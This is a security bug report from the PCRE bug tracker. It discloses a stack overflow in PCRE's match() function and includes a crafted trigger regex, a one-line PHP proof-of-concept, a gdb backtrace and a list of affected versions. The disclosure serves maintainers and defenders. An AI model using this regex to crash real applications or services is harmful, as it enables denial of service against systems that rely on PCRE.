https://bugs.exim.org/show_bug.cgi?id=1638
Bug ID: 1638
Summary: PCRE Library Call Stack Overflow Vulnerability in
match()
Product: PCRE
Version: 10.10 (PCRE2)
Hardware: All
OS: All
Status: NEW
Severity: security
Priority: medium
Component: Code
Assignee: ph10@???
Reporter: rubymail@???
CC: pcre-dev@???
Created attachment 816
-->
https://bugs.exim.org/attachment.cgi?id=816&action=edit
php script to trigger the crash.
I. Summary
PCRE is a regular expression C library inspired by the regular expression
capabilities in the Perl programming language. The PCRE library is incorporated
into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP.
PCRE library is prone to a vulnerability which leads to Stack Overflow. Without
enough bound checking inside match(), the stack memory could be overflowed via
a crafted regular expression. Since PCRE library is widely used, this
vulnerability should affect many applications. At least, an attacker may
exploit this issue to DOS the user running the affected application.
------------------------------------------------------------------
II. Description
Latest version of PCRE is prone to a Stack Overflow vulnerability which could
caused by the following regular expression.
/^(?:(?(1)\\.|([^\\\\W_])?)+)+$/
To reproduce the problem, we could use pcretest provide by PCRE library or
applications which is wrapped with PCRE such as PHP.
For pcretest, simply type the regular expression after the re>
For PHP, latest version of PHP 5.6.9 (wrapped with PCRE 8.37) could be
triggered by following code snippet.
<?php
preg_match("/^(?:(?(1)\\\\.|([^\\\\\\\\W_])?)+)+$/","abcd",$arr);
?>
Other versions and applications may also be affected.
Following test is conveyed under Kali Linux (based on Debian x64) with php
5.6.9:
==============================================================
(gdb) r poc.php
Program received signal SIGSEGV, Segmentation fault.
0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
1439 RMATCH(eptr, ecode, offset_top, md, eptrb, RM49);
(gdb) bt
#0 0x000000000047294f in match (eptr=0x7ffff7eb7d91 "DLAB",
ecode=0x10070ad "\035\\\fw", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
md=0x7fffffffa9a0, eptrb=0x0, rdepth=11130)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#1 0x000000000047e2ee in match (eptr=0x7ffff7eb7d91 "DLAB",
ecode=0x10070dd "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=4,
md=<optimized out>, eptrb=0x0, rdepth=11129)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:2061
#2 0x0000000000472f45 in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070b4 "\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11128)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:983
#3 0x0000000000472e2d in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=0x7fffffffa9a0, eptrb=0x7fffff7ffa00, rdepth=11127)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1878
#4 0x0000000000472957 in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070b3 "\222\205", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=0x7fffffffa9a0, eptrb=0x0, rdepth=11126)
at /root/php-5.6.9/ext/pcre/pcrelib/pcre_exec.c:1439
#5 0x000000000047e2ee in match (eptr=0x7ffff7eb7d90 "ADLAB",
ecode=0x10070e0 "y", mstart=0x7ffff7eb7d90 "ADLAB", offset_top=2,
md=<optimized out>, eptrb=0x0, rdepth=11125)
------------------------------------------------------------------
III. Impact
Stack Overflow
------------------------------------------------------------------
IV. Affected
PCRE 8.33, 8.34, 8.35, 8.36, 8.37 are confirmed to be vulnerable.
PCRE2 10.10 is also confirmed to be vulnerable.
Other applications may also be affected.
------------------------------------------------------------------
V. Credit
Wen Guanxing from Venustech ADLAB is credited for this vulnerability.
--
You are receiving this mail because:
You are on the CC list for the bug.
